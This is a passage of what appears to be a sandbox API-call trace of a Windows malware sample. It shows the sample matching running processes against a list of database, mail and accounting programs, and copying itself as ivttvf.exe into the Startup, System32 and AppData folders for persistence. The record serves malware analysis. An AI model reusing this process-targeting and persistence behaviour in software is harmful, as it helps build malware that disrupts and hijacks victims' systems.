lpString2="wininit.exe") returned -1 [0264.187] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0264.187] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0264.187] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0264.187] lstrlenW (lpString="csrss.exe") returned 9 [0264.187] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0264.187] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0264.187] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0264.187] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0264.187] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0264.187] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0264.187] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0264.187] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0264.187] lstrlenW (lpString="winlogon.exe") returned 12 [0264.188] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0264.188] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0264.188] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0264.188] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0264.188] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0264.188] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0264.188] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0264.188] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0264.188] lstrlenW (lpString="services.exe") returned 12 [0264.188] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0264.188] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0264.188] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0264.188] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0264.188] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0264.188] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0264.188] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0264.188] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0264.188] lstrlenW (lpString="lsass.exe") returned 9 [0264.188] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0264.188] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0264.188] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0264.188] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0264.189] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0264.189] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0264.189] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0264.189] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0264.189] lstrlenW (lpString="lsm.exe") returned 7 [0264.189] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0264.189] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0264.189] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0264.189] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0264.189] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0264.189] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0264.189] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0264.189] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0264.189] lstrlenW (lpString="svchost.exe") returned 11 [0264.189] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0264.189] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0264.189] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0264.189] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0264.189] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0264.189] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0264.189] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0264.189] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0264.190] lstrlenW (lpString="svchost.exe") returned 11 [0264.190] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0264.190] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0264.190] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0264.190] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0264.190] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0264.190] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0264.190] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0264.190] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0264.190] lstrlenW (lpString="svchost.exe") returned 11 [0264.190] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0264.190] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0264.190] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0264.190] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0264.190] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0264.190] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0264.190] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0264.190] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1b0, pcPriClassBase=13, dwFlags=0x0, szExeFile="LogonUI.exe")) returned 1 [0264.191] lstrlenW (lpString="LogonUI.exe") returned 11 [0264.191] lstrcmpiW (lpString1="1c8.exe", lpString2="LogonUI.exe") returned -1 [0264.191] lstrcmpiW (lpString1="1cv77.exe", lpString2="LogonUI.exe") returned -1 [0264.191] lstrcmpiW (lpString1="outlook.exe", lpString2="LogonUI.exe") returned 1 [0264.191] lstrcmpiW (lpString1="postgres.exe", lpString2="LogonUI.exe") returned 1 [0264.191] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="LogonUI.exe") returned 1 [0264.191] lstrcmpiW (lpString1="mysqld.exe", lpString2="LogonUI.exe") returned 1 [0264.191] lstrcmpiW (lpString1="sqlservr.exe", lpString2="LogonUI.exe") returned 1 [0264.191] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0264.191] lstrlenW (lpString="svchost.exe") returned 11 [0264.191] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0264.191] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0264.191] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0264.191] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0264.191] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0264.191] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0264.191] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0264.191] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0264.191] lstrlenW (lpString="svchost.exe") returned 11 [0264.191] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0264.191] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0264.191] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0264.192] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0264.192] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0264.192] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0264.192] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0264.192] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0264.192] lstrlenW (lpString="audiodg.exe") returned 11 [0264.192] lstrcmpiW (lpString1="1c8.exe", lpString2="audiodg.exe") returned -1 [0264.192] lstrcmpiW (lpString1="1cv77.exe", lpString2="audiodg.exe") returned -1 [0264.192] lstrcmpiW (lpString1="outlook.exe", lpString2="audiodg.exe") returned 1 [0264.192] lstrcmpiW (lpString1="postgres.exe", lpString2="audiodg.exe") returned 1 [0264.192] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="audiodg.exe") returned 1 [0264.192] lstrcmpiW (lpString1="mysqld.exe", lpString2="audiodg.exe") returned 1 [0264.192] lstrcmpiW (lpString1="sqlservr.exe", lpString2="audiodg.exe") returned 1 [0264.192] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0264.192] lstrlenW (lpString="svchost.exe") returned 11 [0264.192] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0264.192] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0264.192] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0264.192] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0264.192] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0264.192] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0264.192] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0264.192] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0264.193] lstrlenW (lpString="dllhost.exe") returned 11 [0264.193] lstrcmpiW (lpString1="1c8.exe", lpString2="dllhost.exe") returned -1 [0264.193] lstrcmpiW (lpString1="1cv77.exe", lpString2="dllhost.exe") returned -1 [0264.193] lstrcmpiW (lpString1="outlook.exe", lpString2="dllhost.exe") returned 1 [0264.193] lstrcmpiW (lpString1="postgres.exe", lpString2="dllhost.exe") returned 1 [0264.193] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="dllhost.exe") returned 1 [0264.193] lstrcmpiW (lpString1="mysqld.exe", lpString2="dllhost.exe") returned 1 [0264.193] lstrcmpiW (lpString1="sqlservr.exe", lpString2="dllhost.exe") returned 1 [0264.193] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0264.193] lstrlenW (lpString="userinit.exe") returned 12 [0264.193] lstrcmpiW (lpString1="1c8.exe", lpString2="userinit.exe") returned -1 [0264.193] lstrcmpiW (lpString1="1cv77.exe", lpString2="userinit.exe") returned -1 [0264.193] lstrcmpiW (lpString1="outlook.exe", lpString2="userinit.exe") returned -1 [0264.193] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0264.194] lstrlenW (lpString="explorer.exe") returned 12 [0264.194] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x418, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0264.194] lstrlenW (lpString="dwm.exe") returned 7 [0264.194] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x450, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0264.194] lstrlenW (lpString="svchost.exe") returned 11 [0264.194] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="runonce.exe")) returned 1 [0264.194] lstrlenW (lpString="runonce.exe") returned 11 [0264.194] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ivttvf.exe")) returned 1 [0264.195] lstrlenW (lpString="ivttvf.exe") returned 10 [0264.195] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x3a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ivttvf.exe")) returned 1 [0264.195] lstrlenW (lpString="ivttvf.exe") returned 10 [0264.195] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x510, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0264.195] lstrlenW (lpString="spoolsv.exe") returned 11 [0264.195] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x510, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 0 [0264.195] CloseHandle (hObject=0xe0) returned 1 [0264.196] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6193c0 | out: hHeap=0x5e0000) returned 1 [0264.196] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x619408 | out: hHeap=0x5e0000) returned 1 [0264.196] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x619450 | out: hHeap=0x5e0000) returned 1 [0264.196] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x619470 | out: hHeap=0x5e0000) returned 1 [0264.196] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6194b8 | out: hHeap=0x5e0000) returned 1 [0264.196] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x614bb0 | out: hHeap=0x5e0000) returned 1 [0264.196] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x619320 | out: hHeap=0x5e0000) returned 1 [0264.196] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x619358 | out: hHeap=0x5e0000) returned 1 [0264.196] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f4490 | out: hHeap=0x5e0000) returned 1 [0264.196] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f44b8 | out: hHeap=0x5e0000) returned 1 [0264.196] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6193a0 | out: hHeap=0x5e0000) returned 1 [0264.196] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f44e0 | out: hHeap=0x5e0000) returned 1 [0264.196] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xfffe) returned 0x61ecf8 [0264.196] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xfffe) returned 0x62ed00 [0264.196] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x614bb0 [0264.196] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x614bb0, Size=0x20) returned 0x5f44e0 [0264.196] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x5f44e0, Size=0x40) returned 0x61aa98 [0264.196] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x614bb0 [0264.196] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x614bb0, Size=0x20) returned 0x5f44e0 [0264.196] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x614bb0 [0264.196] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x614bb0, Size=0x20) returned 0x5f44b8 [0264.196] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x614bb0 [0264.196] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x614bb0, Size=0x20) returned 0x5f4490 [0264.196] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x5f4490, Size=0x40) returned 0x61aae0 [0264.196] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x62ed00, nSize=0x7fff | out: lpFilename="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ivttvf.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\ivttvf.exe")) returned 0x47 [0264.196] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xfffe) returned 0x63ed08 [0264.197] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xfffe) returned 0x64ed10 [0264.197] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x614bb0 [0264.197] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x614bb0, Size=0x20) returned 0x5f4490 [0264.197] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x5f4490, Size=0x40) returned 0x61ab28 [0264.197] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x61ab28, Size=0x80) returned 0x6193a0 [0264.197] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6193a0, Size=0x100) returned 0x61bcb0 [0264.197] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0264.197] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x61bcb0 | out: hHeap=0x5e0000) returned 1 [0264.197] ExpandEnvironmentStringsW (in: lpSrc="%windir%\\System32\\ivttvf.exe", lpDst=0x63ed08, nSize=0x7fff | out: lpDst="C:\\Windows\\System32\\ivttvf.exe") returned 0x1f [0264.197] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x64ed10 | out: hHeap=0x5e0000) returned 1 [0264.197] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x63ed08 | out: hHeap=0x5e0000) returned 1 [0264.197] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x100000) returned 0x420020 [0264.197] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x614bb0 [0264.197] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x614bb0, Size=0x20) returned 0x5f4490 [0264.197] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x614bb0 [0264.197] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x614bb0, Size=0x20) returned 0x619a60 [0264.198] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76e20000 [0264.198] GetProcAddress (hModule=0x76e20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76e4d650 [0264.198] Wow64DisableWow64FsRedirection (in: OldValue=0x18fd9c | out: OldValue=0x18fd9c*=0x0) returned 1 [0264.198] lstrlenW (lpString="kernel32.dll") returned 12 [0264.198] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f4490 | out: hHeap=0x5e0000) returned 1 [0264.198] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0264.198] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x619a60 | out: hHeap=0x5e0000) returned 1 [0264.198] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ivttvf.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\ivttvf.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe0 [0264.198] CreateFileW (lpFileName="C:\\Windows\\System32\\ivttvf.exe" (normalized: "c:\\windows\\system32\\ivttvf.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0264.199] CloseHandle (hObject=0xe0) returned 1 [0264.199] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x614bb0 [0264.199] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x614bb0, Size=0x20) returned 0x619a60 [0264.199] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x614bb0 [0264.199] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x614bb0, Size=0x20) returned 0x619a10 [0264.199] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76e20000 [0264.199] GetProcAddress (hModule=0x76e20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76e4d650 [0264.199] Wow64DisableWow64FsRedirection (in: OldValue=0x18fd9c | out: OldValue=0x18fd9c*=0x1) returned 1 [0264.199] lstrlenW (lpString="kernel32.dll") returned 12 [0264.199] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x619a10 | out: hHeap=0x5e0000) returned 1 [0264.199] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0264.199] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x619a60 | out: hHeap=0x5e0000) returned 1 [0264.199] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x420020 | out: hHeap=0x5e0000) returned 1 [0264.199] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xfffe) returned 0x63ed08 [0264.199] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xfffe) returned 0x64ed10 [0264.200] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x614bb0 [0264.200] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x614bb0, Size=0x20) returned 0x619a60 [0264.200] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x619a60, Size=0x40) returned 0x61ab28 [0264.200] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x61ab28, Size=0x80) returned 0x65ed30 [0264.200] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x65ed30, Size=0x100) returned 0x61bcb0 [0264.200] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0264.200] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x61bcb0 | out: hHeap=0x5e0000) returned 1 [0264.200] ExpandEnvironmentStringsW (in: lpSrc="%appdata%\\ivttvf.exe", lpDst=0x63ed08, nSize=0x7fff | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ivttvf.exe") returned 0x39 [0264.200] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x64ed10 | out: hHeap=0x5e0000) returned 1 [0264.200] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x63ed08 | out: hHeap=0x5e0000) returned 1 [0264.200] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x100000) returned 0x420020 [0264.200] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x614bb0 [0264.200] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x614bb0, Size=0x20) returned 0x619a60 [0264.200] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x614bb0 [0264.200] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x614bb0, Size=0x20) returned 0x619a10 [0264.200] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76e20000 [0264.200] GetProcAddress (hModule=0x76e20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76e4d650 [0264.200] 